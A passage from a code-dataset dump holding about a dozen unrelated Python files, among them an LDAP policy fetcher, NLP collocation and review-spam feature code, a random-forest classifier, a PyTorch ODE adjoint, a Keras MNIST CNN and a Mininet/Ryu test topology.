os.path.exists(timestamp_file):\n timestamp_old = file(timestamp_file).read().strip()\n\n if not timestamp_old:\n update_required = True\n\n search = conn.search_s(domain, ldap.SCOPE_SUBTREE, pattern, ['modifyTimestamp'])\n if len(search):\n attrs = search[0][1]\n timestamp_new = attrs['modifyTimestamp'][0]\n if timestamp_new != timestamp_old:\n update_required = True\n\n if update_required:\n search = conn.search_s(domain, ldap.SCOPE_SUBTREE, pattern)\n if len(search):\n attrs = search[0][1]\n file(timestamp_file, 'w').write(timestamp_new)\n file(policy_file, 'w').write(get_ldif(attrs))\n return True, attrs\n\n return False, {}\n\ndef ldap_go(options, q_in, q_out):\n \"\"\"\n Main event loop for LDAP worker\n \"\"\"\n # Load last fetched policy\n logging.info(\"Loading last fetched policy.\")\n filename = os.path.join(options.policydir, \"policy_\", options.username)\n if os.path.exists(filename):\n policy = load_ldif(filename)\n if policy:\n q_in.put({\"type\": \"policy init\", \"policy\": policy})\n\n domain = \"dc=\" + options.domain.replace(\".\", \", dc=\")\n username = \"cn=%s, %s\" % (options.username, domain)\n while True:\n try:\n conn = ldap.open(options.hostname)\n conn.simple_bind(username, options.password)\n while True:\n pattern = \"(cn=%s)\" % options.username\n updated, policy = fetch_policy(conn, options, domain, pattern)\n if updated:\n logging.info(\"LDAP policy was updated.\")\n policy_repr = dict(zip(policy.keys(), ['...' for x in range(len(policy))]))\n logging.debug(\"New policy: %s\" % policy_repr)\n q_in.put({\"type\": \"policy\", \"policy\": policy})\n time.sleep(options.interval)\n except (ldap.SERVER_DOWN, ldap.NO_SUCH_OBJECT, IndexError):\n logging.warning(\"LDAP connection failed. Retrying in 3 seconds.\")\n time.sleep(3)\n","sub_path":"playground/beyza.ermis/ahenk/ajan/ahenk/agent/bck_ldap.py","file_name":"bck_ldap.py","file_ext":"py","file_size_in_byte":3761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"202808387","text":"import os\nimport string\nfrom queue import Queue\nimport re\n\nfrom sentence import Sentence\nfrom sentences_collection import SentencesCollection\n\n\nclass Initialization:\n def __init__(self, path):\n self.path=path\n self.sentences_collection=SentencesCollection()\n\n #Open the main directory, read it's sub files and directories and send the files for treatment.\n def initialize(self):\n print(\"Loading the files and preparing the system...\")\n directories=Queue()\n directories.put(self.path)\n x=''\n try:\n directory_path=''\n while not directories.empty():\n directory_path=directories.get()+'/'\n # print(\"directory path: \",directory_path)\n for x in os.listdir(directory_path):\n path=directory_path+x\n if os.path.isdir(path):\n directories.put(path)\n elif x.endswith(\".txt\"):\n self.file_handler(path)\n else:\n raise IsADirectoryError\n print(\"The system is ready.\")\n except IsADirectoryError:\n print(f'Unknown file {x}')\n\n#Read a file and send each sentence to be insert to a trie.\n def file_handler(self, file_path):\n try:\n with open(file_path, encoding=\"utf8\") as file:\n line_number=1\n i=0\n for line in file:\n i+=1\n if line!=\"\":\n line = ''.join(x for x in line if x.isalpha() or x.isspace())\n line = ' '.join(line.split())\n location=file_path+str(line_number)\n sentence=Sentence(line.rstrip(),location,i)\n self.sentences_collection.add_sentence_obj(sentence)\n except Exception as e:\n print(e)\n","sub_path":"initialization.py","file_name":"initialization.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"419872719","text":"import pycor.resolver as resolver\nimport pycor.utils as utils\nimport pycor.speechmodel as sm\n\n\n__all__ = [\"CollocationResolver\"]\n\nclass CollocationContext(sm.ContextWrapper):\n def __init__(self, parent):\n super().__init__(parent)\n self.collocations = {}\n\n def getcollocation(self, text):\n col = self.collocations.get(text)\n if col is None:\n col = self.parent.getcollocation(text)\n return col\n \n def addcollocation(self, collocation):\n if self.collocations.get(collocation.text) is None:\n self.collocations[collocation.text] = collocation\n\n def clear(self):\n self.collocations.clear()\n\nclass CollocationResolver(resolver.Resolver):\n def resolveDocument(self, sentence_array, context):\n cascadingContext = CollocationContext(context)\n\n for sentence in sentence_array:\n self.resolveSentence(sentence, cascadingContext)\n \n for colloc in cascadingContext.collocations.values():\n if colloc.frequency > 1:\n # print(colloc, colloc.frequency)\n context.addcollocation(colloc)\n \n def resolveSentence(self,sentence, context):\n end = len(sentence.pairs) - 1 \n index = 0\n\n while index < end:\n first, index = self.gettext(sentence, index, context)\n \n if first is None:\n continue\n\n if index >= end:\n break\n\n second, index2 = self.gettext(sentence, index, context, True)\n\n if second is None:\n continue\n\n bigramTxt = ' '.join([second,first])\n\n bigram = context.getcollocation(bigramTxt)\n if bigram is None:\n bigram = sm.CollocationHead([second,first])\n context.addcollocation(bigram)\n bigram.freq()\n\n if index < end :\n second2, index2 = self.gettext(sentence, index, context)\n if index2 >= end:\n break\n\n third, _ = self.gettext(sentence, index2, context, True)\n\n if third is None:\n continue\n \n trigramTxt = ' '.join([third,second2,first])\n\n trigram = context.getcollocation(trigramTxt)\n if trigram is None:\n trigram = sm.CollocationHead([third,second2,first])\n context.addcollocation(trigram)\n trigram.freq()\n return sentence\n\n\n def gettext(self, sentence, index, context, islast=False):\n pair = sentence.pairs[index]\n\n if type(pair) is sm.Sentence :\n self.resolveSentence(pair, context)\n return str(pair), index +1\n elif type(pair) is sm.Quote :\n if(pair.quotetype == sm.QUOTE_TYPE_EQUIV):\n return str(pair.text) , index+1\n else:\n return None, index+1\n else:\n if islast :\n return pair.head.text, index+1\n else:\n return str(pair.text) , index+1\n","sub_path":"pycor/res/collocresolver.py","file_name":"collocresolver.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"532740367","text":"import sys\nsys.path.append('../py')\n\nfrom iroha import *\nfrom iroha.iroha import *\n\nd = IDesign()\nmod_top = IModule(d, \"M_top\")\ntab_top = ITable(mod_top)\nst1_top = IState(tab_top)\n\nmod_sub = IModule(d, \"M_sub\")\nmod_sub.parent_module = mod_top\ntab_sub = ITable(mod_sub)\n\ndesign_tool.ValidateIds(d)\n\nw = DesignWriter(d)\nw.Write()\n","sub_path":"examples/sub_module.py","file_name":"sub_module.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"307326528","text":"import numpy as np\nfrom scipy import spatial\nimport bookingreview\nimport preprocessreview\nfrom pydblite import Base\n\n\nclass ReviewNode:\n def __init__(self, data, prev=None, next=None):\n self.data = data\n self.prev = prev\n self.next = next\n \n def get(self):\n return self.data\n \n def set(self, val):\n self.data = val\n \n def previous_node(self, num = 1):\n if(num == 0):\n return self\n \n return self.prev.previous_node(num-1)\n\n def __str__(self): \n return \"ReviewNode - \"+self.data.__str__() + '\\n'\n \n \nclass LinkedList:\n def __init__(self):\n self.root = None\n self.size = 0\n\n def set_root(self, val):\n self.root = ReviewNode(val)\n self.root.prev = self.root\n self.root.next = self.root\n self.size = 1\n\n def insert_after(self, val, prev):\n if (prev is None) or self.size == 0:\n self.set_root(val)\n \n else:\n inserted = ReviewNode(val, prev, prev.next)\n prev.next.prev = inserted\n prev.next = inserted\n self.size += 1\n \n def insert_tail(self, val):\n if self.size == 0:\n self.set_root(val)\n else:\n self.insert_after(val, self.root.prev)\n\n def to_list(self, get_node = False):\n if self.root is None:\n return []\n \n if get_node: ret = [self.root]\n else: ret = [self.root.data]\n \n temp = self.root.next\n for i in range(1, self.size):\n if get_node: ret.append(temp)\n else: ret.append(temp.data)\n temp = temp.next\n \n return ret\n\n @classmethod\n def list_to_linked(cls, arg):\n ret = LinkedList()\n for val in arg:\n ret.insert_tail(val)\n \n return ret\n \n \n def __str__(self):\n if self.root is None:\n return \"empty\"\n \n string = self.root.__str__()+ '\\n'\n temp = self.root.next\n while (temp is not self.root):\n string = string + temp.__str__() + '\\n'\n temp = temp.next\n \n return string\n\n\nclass ReviewDB(object):\n def __init__(self, name):\n self.review_db = Base(name + \"_DB.pdl\")\n self.review_dict = {}\n \n if self.review_db.exists():\n self.review_db.open()\n self.set_review_dict(self.review_db[0]['review_list'])\n \n else:\n self.review_db.create('review_list', 'id_dict')\n self.review_db.insert([], {})\n self.save_db()\n \n def set_review_dict(self, review_list):\n self.review_dict = {}\n linked_list = LinkedList.list_to_linked(review_list)\n for review_node in linked_list.to_list(get_node = True):\n self.review_dict[review_node.data.review_id] = review_node\n \n def add_review_list(self, bookingReview_list):\n temp_list = list()\n for review in bookingReview_list:\n if not (review.review_id in self.review_dict):\n temp_list.append(review)\n \n temp_list.sort()\n prev_list = self.review_db[0]['review_list']\n \n from heapq import merge\n merged_list = list(merge(temp_list, prev_list))\n self.review_db[0]['review_list'] = merged_list\n \n self.set_review_dict(merged_list)\n \n \n self.review_db.commit()\n \n '''\n def add_review(self, bookingReview):\n if not (bookingReview.review_id in self.review_db[0]['review_dict']):\n self.review_db[0]['review_dict'][bookingReview.review_id] = bookingReview\n self.review_db[0]['tree'].insert(bookingReview) \n \n self.save_db()\n '''\n \n def get_review_node(self, review_id):\n if (review_id in self.review_dict):\n return self.review_dict[review_id]\n \n def get_id_spamRecord (self, id):\n id_dict = self.review_db[0]['id_dict']\n if (id in id_dict):\n return (id_dict[id][0]/id_dict[id][1])\n else:\n return 0.0\n \n def add_spam_result (self, id, result):\n id_dict = self.review_db[0]['id_dict']\n accumulate = 0\n if result:\n accumulate = 1\n \n if (id in id_dict):\n id_dict[id][0] += accumulate\n id_dict[id][1] += 1\n else:\n id_dict[id] = [accumulate, 1]\n \n def save_db(self):\n self.review_db.commit()\n \n def size(self):\n return len(self.review_db[0]['review_list'])\n \n def __str__(self):\n return \"reviewDB __str__ : unimplemented\"\n\n\nclass FormattedReview(object):\n reviewDB = None\n attribute_num = 7\n def __init__(self, preprocessReview):\n \n self.label = preprocessReview.label\n self.review_id = preprocessReview.review_id\n \n self.bookingReview = FormattedReview.reviewDB.get_review_node(self.review_id).data\n \n self.context = preprocessReview.context_word2vec\n self.context_bayes = preprocessReview.context_postag\n self.calc_comp_similarity(preprocessReview)\n \n if preprocessReview.rate == 0:\n self.rate = 1.0\n else:\n self.rate = preprocessReview.rate / 10\n \n self.reiteration_context = self.calc_reiteration_context()\n self.reiteration_repeat = self.calc_reiteration_repeat()\n self.post_time = preprocessReview.post_time % 1\n self.post_vip = (int(preprocessReview.post_time) % 7) / 7\n \n self.id = self.reviewDB.get_id_spamRecord(preprocessReview.id)\n self.reviewDB.add_spam_result(preprocessReview.id, self.label)\n \n def calc_comp_similarity(self, preprocessReview):\n max_sim = -1;\n for company_vec in preprocessReview.company_word2vec:\n for context_vec in preprocessReview.context_word2vec:\n cos_sim = 1 - spatial.distance.cosine(company_vec, context_vec)\n max_sim = max_sim if (max_sim > cos_sim) else cos_sim\n \n self.comp_similarity = max_sim\n \n def calc_reiteration_context(self, num = 1):\n if num > 10: # reiteration_context 최대 수치는 1\n return 0\n \n prev_review_node = FormattedReview.reviewDB.get_review_node(self.review_id).previous_node(num)\n if prev_review_node is None:\n return 0\n\n prev_review = prev_review_node.data\n \n if(prev_review.id == self.bookingReview.id #리뷰어 동일\n and prev_review.context == self.bookingReview.context #텍스트 내용 동일\n and self.bookingReview.post_time - prev_review.post_time < 30): #한달 이내 작성\n return 0.1 + self.calc_reiteration_context(num+1)\n \n else:\n return 0\n \n \n def calc_reiteration_repeat(self, num = 1): \n prev_review_node = FormattedReview.reviewDB.get_review_node(self.review_id).previous_node(num)\n if prev_review_node is None:\n return 0\n\n prev_review = prev_review_node.data\n \n if(prev_review.company == self.bookingReview.company #업체명 동일\n and prev_review.id == self.bookingReview.id): #리뷰어 동일\n \n time_diff = self.bookingReview.post_time - prev_review.post_time\n \n if(time_diff < 1): #하루 이내 작성\n val = 0.1+self.calc_reiteration_repeat(num+1)\n \n elif(time_diff < 365): #1년 이내 작성\n val = 0.1*(365-time_diff)/365+self.calc_reiteration_repeat(num+1)\n \n else:\n val = 0.0\n \n return val if val<1.0 else 1.0\n \n else:\n return 0\n\n def get_attribute(self):\n return np.array([self.comp_similarity, self.rate, self.reiteration_context,\n self.reiteration_repeat, self.post_time, self.post_vip, self.id])\n \n @classmethod \n def setDB(self, reviewDB):\n self.reviewDB = reviewDB\n \n def __str__(self):\n return (\"FormattedReview object {0}:\\n\"\n \" context = \\n{1}\\n\"\n \" context_bayes = \\n{9}\\n\"\n \" comp_similarity = {2}\\n\"\n \" rate = {3}\\n\"\n \" reiteration_context = {4}\\n\"\n \" reiteration_repeat = {5}\\n\"\n \" post_time = {6}\\n\"\n \" post_vip = {7}\\n\"\n \" label = {8}\\n\"\n .format(self.review_id, self.context, self.comp_similarity,\n self.rate, self.reiteration_context, self.reiteration_repeat,\n self.post_time, self.post_vip, self.label, self.context_bayes))\n","sub_path":"Preprocessor/format_module.py","file_name":"format_module.py","file_ext":"py","file_size_in_byte":8981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198547243","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Jul 2 19:53:05 2020\n\n@author: Lindsay Turner\n\nRandom Forest Model \n\"\"\"\n\n##############################################################################\n# IMPORT PACKAGES\n##############################################################################\n\nimport pandas as pd\nimport numpy as np\nimport random\nimport time\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.inspection import permutation_importance\nfrom sklearn.metrics import plot_confusion_matrix\n\n##############################################################################\n# FUNCTIONS\n##############################################################################\n\ndef nre_fun(x, y):\n nre = (x - y) / (x + y)\n return nre\n\n\n# Takes a portion of samples from each class\n# Note: this code is slow and needs revision\ndef undersample_ds(x, classCol, nsamples_class, seed):\n for i in np.unique(x[classCol]):\n if (sum(x[classCol] == i) - nsamples_class != 0): \n xMatch = x[(x[classCol]).str.match(i)]\n x = x.drop(xMatch.sample(n = len(xMatch) - nsamples_class,\n random_state = seed).index)\n return x\n\n\n# changes Classnames into integers representing each class\ndef string_to_int(y):\n new_y = y.copy()\n unique_y = np.unique(new_y)\n new_y = new_y.to_numpy()\n for i in range(len(new_y)):\n for j in range(len(unique_y)):\n if(new_y[i] == unique_y[j]):\n new_y[i] = j\n \n new_y = new_y.astype('int')\n return new_y, unique_y\n \n \n##############################################################################\n# IMPORT DATA & CREATE DATAFRAME\n##############################################################################\n\n# Read in the data file \ndfAll = pd.read_csv(r'C:/Users/linds/NOAA/rf_training/data_raw/training_data_1M_sub.csv')\n\nnsamples_class = 10000 # Number of samples to take from each class\nsample_seed = 42 # seed for random sample\n#training_bc = undersample_ds(dfAll, 'Classname', nsamples_class, sample_seed)\ntraining_bc = dfAll.groupby('Classname').apply(lambda s: s.sample(nsamples_class,\n random_state = sample_seed))\n\n# Run NRE function on the combination of indices that preformed best\ngreen_red = nre_fun(training_bc['green'], training_bc['red'])\nblue_coastal = nre_fun(training_bc['blue'], training_bc['coastal'])\nNIR2_yellow = nre_fun(training_bc['NIR2'], training_bc['yellow'])\nNIR1_red = nre_fun(training_bc['NIR1'], training_bc['red'])\nrededge_yellow = nre_fun(training_bc['rededge'], training_bc['yellow'])\nred_NIR2 = nre_fun(training_bc['red'], training_bc['NIR2'])\nrededge_NIR2 = nre_fun(training_bc['rededge'], training_bc['NIR2'])\nrededge_NIR1 = nre_fun(training_bc['rededge'], training_bc['NIR1'])\ngreen_NIR1 = nre_fun(training_bc['green'], training_bc['NIR1'])\ngreen_NIR2 = nre_fun(training_bc['green'], training_bc['NIR2'])\nrededge_green = nre_fun(training_bc['rededge'], training_bc['green'])\nrededge_red = nre_fun(training_bc['rededge'], training_bc['red'])\nyellow_NIR1 = nre_fun(training_bc['yellow'], training_bc['NIR1'])\nNIR2_blue = nre_fun(training_bc['NIR2'], training_bc['blue'])\nblue_red = nre_fun(training_bc['blue'], training_bc['red'])\n\n# Combine indices into a dataframe\nindices_df = pd.concat([green_red, blue_coastal, NIR2_yellow, NIR1_red,\n rededge_yellow, red_NIR2, rededge_NIR2,\n rededge_NIR1, green_NIR1, green_NIR2, rededge_green,\n rededge_red, yellow_NIR1, NIR2_blue, blue_red],\n axis = 1)\n\nfeature_names = ['green red', 'blue coastal', 'NIR2 yellow', 'NIR1 red',\n 'rededge yellow', 'red NIR2', 'rededge NIR2', 'rededge NIR1',\n 'green NIR1', 'green NIR2', 'rededge green', 'rededge red',\n 'yellow NIR1', 'NIR2 blue', 'blue red']\nindices_df.columns = feature_names\nindices_df = indices_df * 10000\nindices_df['Classname'] = pd.Series(training_bc['Classname'],\n index = indices_df.index)\n\n##############################################################################\n# RANDOM FOREST MODEL\n##############################################################################\n\n# X data for rf\nfeatures = indices_df\n\n# y data for rf. The y data needs to be as integers for sklearn. \n#labels, labels_name = string_to_int(indices_df['Classname'])\n#labels = pd.get_dummies(indices_df['Classname'])\nlabels = pd.factorize(indices_df['Classname'])[0]\n\n# Partition data into testing and training data\nX_train, X_test, y_train, y_test = train_test_split(features[feature_names],\n labels, train_size = 0.9,\n random_state = 42,\n stratify = labels)\n\nt0 = time.time()\n# random classifier \nrf = RandomForestClassifier(n_estimators = 200,\n max_features = 5,\n random_state = 8)\n\nrf.fit(X_train, y_train)\nt1 = time.time()\ntotal_time = t1-t0\n\nresult = permutation_importance(rf, X_train, y_train, random_state = 8)\n\npredictions = rf.predict(X_test)\n\naccuracy = accuracy_score(y_test, predictions)\n\nconfmat = confusion_matrix(y_test, predictions)\ndf_confmat = pd.DataFrame(confmat)\nplot_confusion_matrix(rf, X_test, y_test)\n\n\n","sub_path":"rf_training.py","file_name":"rf_training.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"336152139","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport datetime\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comments',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('name', models.CharField(verbose_name='Имя', max_length=200)),\n ('title', models.CharField(verbose_name='Тема', max_length=200)),\n ('email', models.EmailField(max_length=254)),\n ('text', models.TextField()),\n ('data', models.DateField(default=datetime.datetime(2016, 3, 7, 23, 46, 19, 404907, tzinfo=utc))),\n ],\n options={\n 'verbose_name': 'Комментарий',\n 'verbose_name_plural': 'Комментарии',\n },\n ),\n migrations.CreateModel(\n name='firstPost',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('text', models.TextField(verbose_name='Текст')),\n ('image', models.ImageField(verbose_name='Картинка', upload_to='media')),\n ('title', models.CharField(verbose_name='Заголовок', max_length=200)),\n ],\n options={\n 'verbose_name': 'Первая запись',\n 'verbose_name_plural': 'Первые записи',\n },\n ),\n migrations.CreateModel(\n name='Order',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('name', models.CharField(max_length=200)),\n ('email', models.EmailField(max_length=254)),\n ('status', models.CharField(max_length=200)),\n ('quantity', models.IntegerField(default=0)),\n ('summ', models.FloatField(default=0)),\n ('data', models.DateField(default=datetime.datetime(2016, 3, 7, 23, 46, 19, 405496, tzinfo=utc))),\n ],\n options={\n 'verbose_name': 'Заказ',\n 'verbose_name_plural': 'Заказы',\n },\n ),\n migrations.CreateModel(\n name='secondPost',\n fields=[\n ('id', models.AutoField(auto_created=True, verbose_name='ID', primary_key=True, serialize=False)),\n ('text', models.TextField(verbose_name='Текст')),\n ('image', models.ImageField(verbose_name='Картинка', upload_to='media')),\n ('title', models.CharField(verbose_name='Заголовок', max_length=200)),\n ('link', models.CharField(verbose_name='Ссылка', max_length=200)),\n ('buttonText', models.CharField(verbose_name='Надпись на кнопке', max_length=30)),\n ],\n options={\n 'verbose_name': 'Вторая запись',\n 'verbose_name_plural': 'Вторые записи',\n },\n ),\n ]\n","sub_path":"magazin/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":3319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"104470175","text":"\nimport os, click\nfrom sanic import Sanic\nfrom sanic.response import json\nfrom sanic_cors import CORS, cross_origin\n\nfrom stage import add_route as stage_add_route\n\napp = None\n\ndef path_check():\n path = os.path.join(os.getcwd(), 'tmp/')\n if not os.path.exists(path):\n os.mkdir(path)\n\n@click.command()\n@click.option('--host', default='0.0.0.0', type=str)\n@click.option('--port', default=8000, type=int)\ndef run(host, port):\n path_check()\n\n global app\n app = Sanic()\n CORS(app)\n app.add_route(index, '/', methods=['GET'])\n stage_add_route(app)\n app.run(host=host, port=port)\n\nasync def index(request):\n return json({ 'success': True, 'data': 'Hello World!' })\n\nif __name__ == '__main__':\n run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"412811406","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import patterns, url\n\nurlpatterns = patterns('',\n url(r'^signup/$', 'chain.views.signup'),\n url(r'^login/$', 'chain.views._login'),\n url(r'^logout/$', 'chain.views._logout'),\n url(r'^calendar/$', 'chain.views.calendar', name='calendar'),\n url(r'^calendar/entries/$', 'chain.views.get_entries'),\n url(r'^punch/$', 'chain.views.punch'),\n)\n\n","sub_path":"chain/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"594590771","text":"import numpy\nimport torch\n\nfrom ODEF import ODEF\nfrom mysolver import simplest_euler_ode_solver as ode_solve\n\nclass ODEAdjoint(torch.autograd.Function):\n @staticmethod\n def forward(ctx, z0, t, flat_parameters, func):\n assert isinstance(func, ODEF)\n bs, *z_shape = z0.size()\n time_len = t.size(0)\n\n with torch.no_grad():\n z = torch.zeros(time_len, bs, *z_shape).to(z0)\n z[0] = z0\n for i_t in range(time_len - 1):\n z0 = ode_solve(z0, t[i_t], t[i_t+1], func)\n z[i_t+1] = z0\n\n ctx.func = func\n ctx.save_for_backward(t, z.clone(), flat_parameters)\n return z\n\n @staticmethod\n def backward(ctx, dLdz):\n \"\"\"\n dLdz shape: time_len, batch_size, *z_shape\n \"\"\"\n func = ctx.func\n t, z, flat_parameters = ctx.saved_tensors\n time_len, bs, *z_shape = z.size()\n n_dim = numpy.prod(z_shape)\n n_params = flat_parameters.size(0)\n\n # Dynamics of augmented system to be calculated backwards in time\n def augmented_dynamics(aug_z_i, t_i):\n \"\"\"\n tensors here are temporal slices\n t_i - is tensor with size: bs, 1\n aug_z_i - is tensor with size: bs, n_dim*2 + n_params + 1\n \"\"\"\n z_i, a = aug_z_i[:, :n_dim], aug_z_i[:, n_dim:2*n_dim] # ignore parameters and time\n\n # Unflatten z and a\n z_i = z_i.view(bs, *z_shape)\n a = a.view(bs, *z_shape)\n with torch.set_grad_enabled(True):\n t_i = t_i.detach().requires_grad_(True)\n z_i = z_i.detach().requires_grad_(True)\n func_eval, adfdz, adfdt, adfdp = func.forward_with_grad(z_i, t_i, grad_outputs=a) # bs, *z_shape\n adfdz = adfdz.to(z_i) if adfdz is not None else torch.zeros(bs, *z_shape).to(z_i)\n adfdp = adfdp.to(z_i) if adfdp is not None else torch.zeros(bs, n_params).to(z_i)\n adfdt = adfdt.to(z_i) if adfdt is not None else torch.zeros(bs, 1).to(z_i)\n\n # Flatten f and adfdz\n func_eval = func_eval.view(bs, n_dim)\n adfdz = adfdz.view(bs, n_dim)\n return torch.cat((func_eval, -adfdz, -adfdp, -adfdt), dim=1)\n\n dLdz = dLdz.view(time_len, bs, n_dim) # flatten dLdz for convenience\n with torch.no_grad():\n ## Create placeholders for output gradients\n # Prev computed backwards adjoints to be adjusted by direct gradients\n adj_z = torch.zeros(bs, n_dim).to(dLdz)\n adj_p = torch.zeros(bs, n_params).to(dLdz)\n # In contrast to z and p we need to return gradients for all times\n adj_t = torch.zeros(time_len, bs, 1).to(dLdz)\n\n for i_t in range(time_len-1, 0, -1):\n z_i = z[i_t]\n t_i = t[i_t]\n f_i = func(z_i, t_i).view(bs, n_dim)\n\n # Compute direct gradients\n dLdz_i = dLdz[i_t]\n dLdt_i = torch.bmm(torch.transpose(dLdz_i.unsqueeze(-1), 1, 2), f_i.unsqueeze(-1))[:, 0]\n\n # Adjusting adjoints with direct gradients\n adj_z += dLdz_i\n adj_t[i_t] = adj_t[i_t] - dLdt_i\n\n # Pack augmented variable\n aug_z = torch.cat((z_i.view(bs, n_dim), adj_z, torch.zeros(bs, n_params).to(z), adj_t[i_t]), dim=-1)\n\n # Solve augmented system backwards\n aug_ans = ode_solve(aug_z, t_i, t[i_t-1], augmented_dynamics)\n\n # Unpack solved backwards augmented system\n adj_z[:] = aug_ans[:, n_dim:2*n_dim]\n adj_p[:] += aug_ans[:, 2*n_dim:2*n_dim + n_params]\n adj_t[i_t-1] = aug_ans[:, 2*n_dim + n_params:]\n\n del aug_z, aug_ans\n\n ## Adjust 0 time adjoint with direct gradients\n # Compute direct gradients\n dLdz_0 = dLdz[0]\n dLdt_0 = torch.bmm(torch.transpose(dLdz_0.unsqueeze(-1), 1, 2), f_i.unsqueeze(-1))[:, 0]\n\n # Adjust adjoints\n adj_z += dLdz_0\n adj_t[0] = adj_t[0] - dLdt_0\n return adj_z.view(bs, *z_shape), adj_t, adj_p, None\n\nif __name__ == \"__main__\":\n pass","sub_path":"msurtsukov/ODEAdjoint.py","file_name":"ODEAdjoint.py","file_ext":"py","file_size_in_byte":4241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"98988252","text":"\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Conv2D, MaxPooling2D, Flatten, Dropout\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\nfrom keras import backend as K\n\n# data pre-process\n(X_train, Y_train), (X_test, Y_test) = mnist.load_data()\nif K.image_data_format() == 'channels_first':\n X_train = X_train.reshape(X_train.shape[0], 1, 28, 28)/255\n X_test = X_test.reshape(X_test.shape[0], 1, 28, 28)/255\n input_shape = (1, 28, 28)\nelse:\n X_train = X_train.reshape(X_train.shape[0], 28, 28, 1)/255\n X_test = X_test.reshape(X_test.shape[0], 28, 28, 1)/255\n input_shape = (28, 28, 1)\nY_train = to_categorical(Y_train, num_classes=10)\nY_test = to_categorical(Y_test, num_classes=10)\n\n# build model\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(5, 5), activation='relu', input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(128, kernel_size=(3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(1024, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(10, activation='softmax'))\nmodel.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n\n# train\nmodel.fit(X_train, Y_train, epochs=10, batch_size=32, validation_data=(X_test, Y_test))\n","sub_path":"3_cnn/cnn_mnist.py","file_name":"cnn_mnist.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"48917224","text":"#!/usr/bin/python\n\nfrom mininet.net import Mininet\nfrom mininet.topo import Topo\nfrom mininet.cli import CLI\nfrom mininet.node import UserSwitch,RemoteController\nfrom mininet.term import makeTerm\nimport os, time\n\nclass MyTopo( Topo ):\n \"Simple topology example.\"\n\n def __init__( self):\n \"Create custom topo.\"\n\n # Add default members to class.\n Topo.__init__(self)\n\n # Add nodes\n \n Host1=self.addHost('h1', ip='10.0.0.1/24')\n Host2=self.addHost('h2', ip='10.0.0.2/24')\n switch1=self.addSwitch('s1')\n switch2=self.addSwitch('s2')\n switch3=self.addSwitch('s3')\n switch4=self.addSwitch('s4')\n switch5=self.addSwitch('s5')\n\n # Add edges\n self.addLink( Host1, switch1, 1, 1)\n self.addLink( switch1, switch2, 2, 1)\n self.addLink( switch1, switch3, 3, 1)\n self.addLink( switch1, switch4, 4, 1)\n self.addLink( switch2, switch5, 2, 1)\n self.addLink( switch3, switch5, 2, 2)\n self.addLink( switch4, switch5, 2, 3)\n self.addLink( switch5, Host2, 4, 1)\n\n######Starting controller\n\n\nos.system(\"xterm -e 'ryu-manager ~/ryu/ryu/app/openstate/playground/forwarding_consistency_many_to_1_alternative.py'&\")\n\n\n\n######Starting mininet\ntopos = { 'mytopo': ( lambda: MyTopo() ) }\nmytopo=MyTopo()\ntime.sleep(1)\nprint(\"\\n********************************** HELP *********************************************\")\nprint(\"Type \\\"python ~/ryu/ryu/app/openstate/echo_server.py 200\\\" in h2's xterm\")\nprint(\"Type \\\"nc 10.0.0.2 200\\\" in h1's xterm\")\nprint(\"Watching the tcpdump results, it is possible to see that forwarding consistency is guaranteed IN EACH DIRECTION.\\n\"\n \"In order to test new path selection, close and reopen netcat.\")\nprint(\"\\nTo exit type \\\"ctrl+D\\\" or exit\")\nprint(\"*************************************************************************************\")\nnet = Mininet(topo=mytopo,switch=UserSwitch,controller=RemoteController,cleanup=True,autoSetMacs=True,autoStaticArp=True,listenPort=6634)\nnet.start()\nos.system(\"xterm -e 'tcpdump -i 